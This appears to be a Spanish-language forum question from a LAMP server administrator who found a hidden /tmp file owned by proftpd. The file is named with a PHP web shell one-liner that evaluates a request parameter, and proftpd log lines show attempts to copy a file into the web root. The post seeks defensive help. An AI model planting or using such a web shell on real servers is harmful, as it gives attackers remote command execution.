Recientemente descubrí un archivo oculto en /tmp
de propiedad de proftpd
que me preocupa un poco:
-rw-r--r-- 1 proftpd nogroup <timestamp> 86 .<?php eval($_REQUEST[cmd]); ?>
Intenté ver su contenido en un editor de texto, pero probablemente fue un mal movimiento, ya que altera la última propiedad de tiempo de acceso. De todos modos aquí está la salida de stat
:
File: ‘/tmp/.<?php eval($_REQUEST[cmd]);?>’
Size: 86 Blocks: 8 IO Block: 4096 regular file
Device: fc00h/64512d Inode: 175564 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 113/ proftpd) Gid: (65534/ nogroup)
Access: <another-timestamp>
Modify: <one-timestamp>
Change: <one-timestamp>
Birth: -
La verificación del registro de proftpd en el momento en que se modificó el archivo me da muchas entradas como esta:
<timestamp> <myhost> proftpd[9114] localhost.localdomain (<some-naughy-domain>[<IP>]): error opening destination file '/var/www/public_html/<hosted-domain>/www/dbvar.php' for copying: No such file or directory
¿Podría usarse este archivo como parte de un exploit?
Estoy trabajando en un entorno de servidor LAMP.